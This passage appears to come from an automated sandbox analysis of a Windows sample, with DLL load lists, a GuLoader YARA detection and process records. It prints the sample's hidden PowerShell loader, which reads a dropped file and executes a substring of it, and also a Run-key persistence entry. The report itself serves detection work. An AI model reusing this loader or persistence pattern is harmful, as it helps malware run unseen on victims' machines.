            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
            Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: dpapi.dll
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 0000000F.00000002.2205196768.000000000F541000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1641973533.000000000E71D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Obfuscated command line found
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udbygningerne230
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udbygningerne230
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
